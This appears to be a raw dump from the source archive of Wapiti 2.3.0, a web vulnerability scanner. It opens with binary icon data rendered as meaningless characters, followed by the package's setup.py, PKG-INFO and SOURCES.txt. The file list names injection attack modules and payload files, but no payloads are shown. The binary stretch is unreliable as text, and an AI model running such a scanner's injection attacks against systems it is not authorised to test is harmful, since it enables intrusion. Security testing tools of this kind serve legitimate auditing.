*0S:f!Dw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dx!Cw!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Ey Cw Cw!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx As4\/R/R/R/S4 ,/R/S &.Q1V@r!Dx!Dx!Dx!Dx!Dy=l0S/R)I h 5]!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy;i  /TAr!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx:f/S/R/R.P  (E0Ta6(F"Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey7` 2 As!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx;g/S/R0S3!:3Y Bt!Dx!Dx!Dx!Dx!Dy;i0T6K!:!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey%A2X!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bu4\/R/S)G %1U@q!Dx!Dx!Dx!Dx!Dx?n1V .1 + Bu!Dx!Dx!Dx!Dx!Dx!Dx!Dx As $@p!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx=k0S/R.P -N>n!Dx!Dx!Dx!Dx!Dx Ar1V $?o!Dy!Dx!Dx!Dx!Dx!Dx!Ey;h!:!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Bv5]/R0S 0&B>m!Dy!Dx!Dx!Dx!Dx Bu0U w 8d!Ey!Dx!Dx!Dx!Dx!Dx!Ez/S -Q!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dxm!Dy!Dx!Dx!Dx!Dx Cv/R I,N!Ez!Dx!Dx!Dx!Dx!Dx"Ez$@ 8d!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bt4Z/R*I &=l!Dy!Dx!Dx!Dx!Dx!Dw)H^6!Dx!Dx!Dx!Dx!Dx!Dx!Cw 1 >n!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx:e/R,M m!Dy!Dx!Dx!Dy?o  - Cv!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy8d , >=m!Dy!Dx!Dx Bu -#p0T!Ey!Dx!Dy@q  $ As!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy=k.--776 :g!Ey!Dy?o!###EDD7b!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Cv4[  ?n!Dy!Dx!Ey4\  %@q!Dx!Dx Bt '@q!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy%C MMM>>>}}}">>}}} 3 Cw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dw5]@q!Dy!Dx Bu ..q-O!Ey!Dx!Cw 0 >n!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy@pKJJmmmYXX >n Bt$;;:kkkiii;i!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx4\  % As!Dx!Ey1W =k!Ey!Ey 8 m %P 1k1 + Bu!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey6_  2Z;h  -P!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Cw1 0q6Y  '5!;4 !  >n!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dy@pONN\\\ >m As">>=nmm;h!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx@r " 3";6 ( b ";3Y>m Bt!Dx"Ez!Dx Ar7`53@r!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx$A :!Dx!Ey)I  1 Cv!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx As!904] @q!Cw"Ez!Dx Bt?n4\#>h 0 Bu!Ez!Dy!Dx!Dx!Dx!Dx!Dx!Ey Cv Bt!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dyn'''JJI6`!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bt Cv!Ez!Dx!Dx!Dx!Dx!Dx!Dy!Ez!Dw 8w (G!Dw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy0V @@?KJJ -P!Dx!Dx!Dx!Dy4\ 544WWV )I!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx,N  ,N!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx.R %%$+**+M!Cw!Dx!Dx!Dx!Dx!Dx2W }}|221 (F Cv!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy0U!! ,M!Dw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey7` ' GFFa``baaJII $5]!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy9d - CCB`__cbbMML""" 2Y!Dw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx/T -% )I Cv!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey As1X6!   50UAr!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey Bt3[9"   2.R?p!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dw-P0!"<?q!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ez!Dx As?o?o Ar!Dx!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ez!Dy As?o?oAr!Dw!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey As&C + &5^!Dx!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey!Dx7b + ` 98d!Cv!Ez!Ey!Dy!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Ey!Ez!Cv:f#= l ,  .+M9d>m>n>n Cu!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Cv>m?n>n9f-P 2 4=    %A Cv!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dw)G    E Lt /T!Dx!Cv Bu Bu Bu Cv!Dx"Ez!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ez"Ez!Dx Bu Bu Bu Bu!Dw!Dy4[wQ!,>Qb 21 - , , -5(G6_ As!Ey!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Ey@q4[&C4 , , , -14 `O;)   9Uq &0T Bu!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!EyAr,M  mQ5=a     $ * .146 8 9 981 #3!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Bu 0  +L-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q-Q.Q.Q-P+L(H#> / " y9p  #4&C*L-P.Q.Q-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q#??o!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey:g 'E-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q.Q.Q-O*K%B2  bT  )"=)J-O.Q-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q-Q.Q.Q'F =k!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey6_ *J.Q.Q-Q-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q.Q,O)I : & C ~!:*K-P.Q-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q.Q-Q,N*J'F$@7 -  ' Bt!Ez!Ey!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Ey!Ez?o / 8$@(G+K-N.Q.Q-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q.Q-P)I6g 4+M-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P.Q-P*K%C5 (    'E1W9e=m@pAr Bs Bt Bt As Ar?p=m9e1X'E   )7&D+L-P.Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q.Q*K .eR !:-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q-Q*K!; ' ~   # ' ) ) & "     )">+L.Q-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P39 0-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q(G . qL*8[yx\8 .Qw 3*J-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,O ( U *L-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q+M2 z=  E 8,N-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q(G 61.Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q)H !HU '*L-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q 'y$@-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q-P-P-P-P-P-P-P-P-P-P-P-P(GU g "*K-P-P-P-P-P-P-P-P-P-P-P-P-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P.Q7 (H-Q-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P,N)I+M-Q-P-P-P-P-P-P-P-P-Q)J2C #+M-P-P-P-P-P-P-P-P-P-P+L)I,O-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-P-Q$? )H-Q-P-P-P-P-P-P-Q-Q-P-P-P-P-P-P-P,M ' &C-Q-P-P-P-P-P-P-P,N %)< --P-P-P-P-P-P-P-P-P#? /,O-P-P-P-P-P-P-P-Q-Q-P-P-P-P-P-P-Q%B )H-Q-P-P-P-P-P-O)H(G-O-Q-P-P-P-P-Q$? 'E-Q-P-P-P-P-P-Q68N #>-Q-P-P-P-P-P-Q#@ (F-Q-P-P-P-P-Q,N(F)I-P-P-P-P-P-P-Q%A 'E-Q-P-P-P-P-Q!: ')H-Q-P-P-P.Q3  ,M-P-P-P-P-P)I d+M-P-P-P-P-Q)J "=.Q-P-P-P-P'E !  $A-Q-P-P-P-P.Q"<"<.Q-P-P-P-P,N'D-P-P-P.Q 0%7-Q-P-P-P-Q1!:.Q-P-P-P-P . 8.Q-P-P-Q$?  '-P-P-P-P-P.Q3 /.Q-P-P-P-P*J U*J-Q-P.Q /e )H-Q-P-P*K Nj ,O-P-P-Q%B I 8.Q-P-Q'F e,M-P-P-P-P-P &u^  ,O-P-P-P-P)I  ,-P-P.Q 1 "+L.Q.R : %B.Q.Q)I!;.Q-P,N #;+M-P-P-P-P+L =$(G-Q-P-P-P*J &D %C-Q.Q43">(Gf $(H!:! #>-Q.Q!;-D,M-P-P-P-Q$A3.Q-P-P-P+L 5 '-P.Q7@ 0 .$A.Q,NsS  ,O-P-P-P-P *{O *L-P-P-P,NH1 &D.R!:$}@Tq&C.R"<f &-Q-P-P-Q(H 57-Q-P-P-P #^ *-Q"< (G,O  s{ ,.Q-P-P-Q .c *K-P-P.Q *r8 'E#>  (H#>#3.Q-P-Q(F F .-P-P.Q / #6"<w 8.Q-P,O %K $@-Q.Q4.  #>.Q-Q 94 (H.R 9I<T5%C.R&C p *K!;&^;FY'E(G . +  0 5h%, 2???????????????????????????@8xx?(0` $-    $ % #  g " $ %   L#=,N %+L,O,N+L 0  $*J,N,O-P (*J'F%B.R4 *J-P-P.Q62"; ,-P-P-P-O %-Q*K? /.Q)I%B-Q-P+M **J.Q +'F-Q-P*K#?.R!; m :-P&C)J.R,N 06/R0S%@ **I.Q,M$@-P%C   2 / ."<$@ 8 *6.P/R/R/R#= )5$?#>1 + 0   !:/R.Q&B67&B1W:fm5\/R/R/R/R /R+L0S7a Bt!Dx!Dx!Dx!Cw.O1U1V0T/S.P%@ + 8.P7` Bu!Dy=k1U/R-N  ;28c!Cw!Dx!Dx!Dx Bu3Z1 1,M4\;g?o@q>m9d2X0S-N4 /,M7` Cv!Dx;g/S0S4B u*I Bu!Dx!Dx!Dx!Dw5] -72Xn4[/R"< ,.Q>n!Ey@p1V+L *Ar!Dx!Dx!Dx Bu"<49e!Cw!Dx!Dx"Ez'E.Q4[!:!Ey!Dx At6^/S625\ Cv!Dx7a-O !3 Cv!Dx!Dx!Ey3Z ,8c!Dx!Dx!Dx!Dx!Dy7a)H@r Bt+K4\!Dy!Dx!Dx Bu6^.P ,&B>m!Ey?n/S %4 Cv!Dx!Dx Bu7/S!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Ez!Dx!Dx!Ez!Ey!Dx!Dx!Dx!Dx At4[(F *6_!Dx Cu3Y % 0 Bt!Dx!Ey7a"; Bt!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy?o1V0)H!Cv!Dx6_ " '@p!Dx!Ey*J3[!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx:e&B5 As!Ey8c:f!Ey Bt$@?o!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx As/R .>n!Ez6`  S/S"Ez>n$@ Bu!Dx!Dx!Dx!Dx!DyAt?r Cw!Dy!Dx!Dx!Dy Cx?rAt!Dy!Dx!Dx!Dx!Dx7` /m$? Bu!Dx!Ey8emqxeeeUUU*;T$7RjjjQQQy|6b!Ey!Dx@r 8=l$?5 .R$@@p!Dx!Ez3Y<<<&&&EO]:EU>>>%%%2U!Ez!Dx?o!;/T 8  " , );h!Ey!Ez5^6CV.o!Dx!DxAr6`?o@q2X <5>n!Ez!Ey!Dx!Dx!Dx!Dy:g6CV_en5U Bu Cw5WZ`j:FW9e!Ey!Dx!Dx!Dx!Ey!Ez?o7 A; /7a!Dw!Ez!Ez!Dx!Dx!Ey@s6a4]:i Cx!Dx!Dx!Dx;j4]6a?q!Ey!Dx!Dx!Ez!Ez!Dw8b1@"<.R4\!Cw!Ez!Ez"Ez!Ez!Ey!Dy!Dx!Dx!Dx!Dx!Dy!Ey!Ez"Ez!Ez!Ez!Cw4\/R#=" /b  9'E'E0T@p!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Ey?o/S'E'D!; c.  +T}   # * /3576 , -7b!Dy!Dx!Dx!Dx!Dx!Dy6_ + ,7753 / ) #  {Q) :  ! .!:&C)J,N-P-Q.Q.Q.Q.R.R.R#> -Ar!Dy!Dx!Dx!Dy?p *$@.R.R.R.Q.Q.Q-Q-P,M)I&C : .   6 "!:)H,O.Q.Q-Q-P-P-P-P-P.Q-P*J%B : /6`@qAsAs@q5] 0!:%B*K-P-Q-P-P-P-P-P-Q.Q.Q,O(H 9 !  ,,O.Q-P-P-P-P-P-P-P-P-P-O#> '  z^j ' , , 'j`|   ($@-P-P-P-P-P-P-P-P-P-P.Q,N *t )I-P-P-P-P-P-P-Q-P-P-P,N , C G .,N-P-P-P-Q-P-P-P-P-P-Q(G ,N-P,N+L-P-P 9 -+M-P-P .  1-P-P+L +!;.Q-P+L,N-P+M+L.Q 1$?-Q !0.R%B  &E.Q - %.Q"= 4.Q*J &C.Q %d )I #?6 %KV (5 D &(G h (.R$@ i ..R )?g 0 &2 { = ) -[I -.R *\ 'F 0T 3= a4&C G  ,c?8p .>k KV a???811s( @  $ * 35 - ] I )55  & ("7)I )I.R)I , ,&D.Q,N "&C#> 8 $)I5(G.Q"<&B)H 8-O*K2*K + * '5"=$@ 9"</R0S$?7$@#>6 ' ,& /,M-N*I-P6_>m>m 9*J1U/S*I!:!:1U@p As4Z.Q1>*I Bu!Dx!Dx8b 8(F8c@q Bu@q;g2X'D6/RAr@p2W%A C  p9d!Ey!Dyn9eg.2X>m0U!Dy!Dx Bv!=h.Eh#?i Bv Cw"?i.Eh!>hBv!Dx Bt'Dqlu~~~jihhq}dm{{{zkkks|=o!Dx,N+L D 92!:(G!Cw>qepdn|^hwmw>p!Cw(G!:2 < V/R BuAr!Dx Cx'Ag'Ag%@g)Bg Dx!DxAr Cu/S Z $].R>n Cv!Ey!Dy=k$>f=j Cw Cx=k$>f=k Dy!Ez Cv?o/S %a E ! 00U5];h!Dy!Dy!Dx!Dx!Dy!Dx;h4]0U1 "F  K z  ' .35!;"= 8-O!Cw!Dx!Dx!Cv,M 8"=!;52 . ' y I" ."<'F*K,O-P.Q.R,O)I$@ +9dAsAs8c +$@)I,O.R.Q-P,O*K'F"< .&D-P.Q-Q.Q-P-P,N!: % ` X ,|66 ,| Y b &!;,O-P-P.Q-Q.Q-P&C --Q+M,O+L"<,N-P2 \  a3-P+M"<+M,O+M-P + +,O * 0%B6$@ t |%A4 &C . ,,O )(G $ q 1 q i c x 1 l '(FB 0 )$  `h $ + /; w   p????????ph(   .n /#>53$@ / 0 -z"<'E*J*J&D"< / ,N,M7a9d5]3Y4\2W*I -P +K@p=k-O-N,L*J8b8b&B 3>;i?n.Q:f6_4]5^)H9d1W (@&CR?p5^>n!Dx;i;i Cw9d-O8c1T#=<:f:g Cx"Cu!Dw!Dw"Cu Cv2X6`5> $.R:h7S|SbySbz9T}7b-P &  )H9hF^{{H`9g)H !! )I5^=j9Rx-Kx,Kx:Sx=j5^)I - .p8!;#>&D(H>n>n(H&D#>!;8 .o+ 9*K*J+M$? /q $O'E_'E_ #P /r$@+M*J*J 9 :4 - 09 < 0 -4 9 % M N %wapiti-2.3.0+dfsg/setup.cfg000066400000000000000000000000731240201516300155430ustar00rootroot00000000000000[egg_info] tag_build = tag_date = 0 tag_svn_revision = 0 wapiti-2.3.0+dfsg/setup.py000066400000000000000000000042641240201516300154420ustar00rootroot00000000000000#!/usr/bin/python from setuptools import setup, find_packages VERSION = "2.3.0" DOC_DIR = "share/doc/wapiti" doc_and_conf_files = [] doc_and_conf_files.append((DOC_DIR, ["doc/AUTHORS", "doc/ChangeLog_Wapiti", "doc/ChangeLog_lswww", "doc/example.txt", "INSTALL", "README", "TODO", "VERSION"])) doc_and_conf_files.append(("share/man/man1", ["doc/wapiti.1.gz"])) # Main setup( name="wapiti", version=VERSION, description="A web application vulnerability scanner", long_description="""\ Wapiti allows you to audit the security of your web applications. It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.""", url="http://wapiti.sourceforge.net/", author="Nicolas Surribas", author_email="nicolad.surribas@gmail.com", license="GPLv2", platforms=["Any"], packages=find_packages(), data_files=doc_and_conf_files, include_package_data=True, scripts=[ "bin/wapiti", "bin/wapiti-cookie", "bin/wapiti-getcookie" ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: End Users/Desktop', 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: GNU General Public License (GPL)', 'Operating System :: MacOS :: MacOS X', 'Operating System :: Microsoft :: Windows', 'Operating System :: POSIX', 'Operating System :: Unix', 'Programming Language :: Python', 'Topic :: Security', 'Topic :: Internet :: WWW/HTTP :: Indexing/Search', 'Topic :: Software Development :: Testing' ], install_requires=[ 'requests>=1.2.3', 'BeautifulSoup' ] ) wapiti-2.3.0+dfsg/wapiti.egg-info/000077500000000000000000000000001240201516300167115ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapiti.egg-info/PKG-INFO000066400000000000000000000024651240201516300200150ustar00rootroot00000000000000Metadata-Version: 1.1 Name: wapiti Version: 2.3.0 Summary: A web application vulnerability scanner Home-page: http://wapiti.sourceforge.net/ Author: Nicolas Surribas Author-email: nicolad.surribas@gmail.com License: GPLv2 Description: Wapiti allows you to audit the security of your web applications. It performs "black-box" scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable. Platform: Any Classifier: Development Status :: 5 - Production/Stable Classifier: Environment :: Console Classifier: Intended Audience :: End Users/Desktop Classifier: Intended Audience :: Developers Classifier: Intended Audience :: System Administrators Classifier: License :: OSI Approved :: GNU General Public License (GPL) Classifier: Operating System :: MacOS :: MacOS X Classifier: Operating System :: Microsoft :: Windows Classifier: Operating System :: POSIX Classifier: Operating System :: Unix Classifier: Programming Language :: Python Classifier: Topic :: Security Classifier: Topic :: Internet :: WWW/HTTP :: Indexing/Search Classifier: Topic :: Software Development :: Testing wapiti-2.3.0+dfsg/wapiti.egg-info/SOURCES.txt000066400000000000000000000056261240201516300206060ustar00rootroot00000000000000INSTALL MANIFEST.in README TODO VERSION setup.py bin/wapiti bin/wapiti-cookie bin/wapiti-getcookie doc/AUTHORS doc/COPYING doc/ChangeLog_Wapiti doc/ChangeLog_lswww doc/cookie.ico doc/example.txt doc/wapiti.1.gz doc/wapiti.ico wapiti.egg-info/PKG-INFO wapiti.egg-info/SOURCES.txt wapiti.egg-info/dependency_links.txt wapiti.egg-info/requires.txt wapiti.egg-info/top_level.txt wapitiCore/__init__.py wapitiCore/attack/__init__.py wapitiCore/attack/attack.py wapitiCore/attack/mod_backup.py wapitiCore/attack/mod_blindsql.py wapitiCore/attack/mod_crlf.py wapitiCore/attack/mod_exec.py wapitiCore/attack/mod_file.py wapitiCore/attack/mod_htaccess.py wapitiCore/attack/mod_nikto.py wapitiCore/attack/mod_permanentxss.py wapitiCore/attack/mod_sql.py wapitiCore/attack/mod_xss.py wapitiCore/config/attacks/backupPayloads.txt wapitiCore/config/attacks/blindSQLPayloads.txt wapitiCore/config/attacks/execPayloads.txt wapitiCore/config/attacks/fileHandlingPayloads.txt wapitiCore/config/attacks/xssPayloads.txt wapitiCore/config/language/de/LC_MESSAGES/wapiti.mo wapitiCore/config/language/en/LC_MESSAGES/wapiti.mo wapitiCore/config/language/es/LC_MESSAGES/wapiti.mo wapitiCore/config/language/fr/LC_MESSAGES/wapiti.mo wapitiCore/config/language/ms/LC_MESSAGES/wapiti.mo wapitiCore/config/reports/generators.xml wapitiCore/config/vulnerabilities/anomalies.xml wapitiCore/config/vulnerabilities/vulnerabilities.xml wapitiCore/file/__init__.py wapitiCore/file/anomalyxmlparser.py wapitiCore/file/auxtext.py wapitiCore/file/reportgeneratorsxmlparser.py wapitiCore/file/vulnerabilityxmlparser.py wapitiCore/language/__init__.py wapitiCore/language/language.py wapitiCore/language/vulnerability.py wapitiCore/language_sources/de.po wapitiCore/language_sources/en.po wapitiCore/language_sources/es.po wapitiCore/language_sources/file_list.txt wapitiCore/language_sources/fr.po wapitiCore/language_sources/generateSources.sh wapitiCore/language_sources/generateTranslations.sh wapitiCore/language_sources/ms.po wapitiCore/net/HTTP.py wapitiCore/net/__init__.py wapitiCore/net/crawlerpersister.py wapitiCore/net/jsoncookie.py wapitiCore/net/lamejs.py wapitiCore/net/lswww.py wapitiCore/net/swf_parser.py wapitiCore/net/jsparser/__init__.py wapitiCore/net/jsparser/jsparser.py wapitiCore/report/__init__.py wapitiCore/report/htmlreportgenerator.py wapitiCore/report/jsonreportgenerator.py 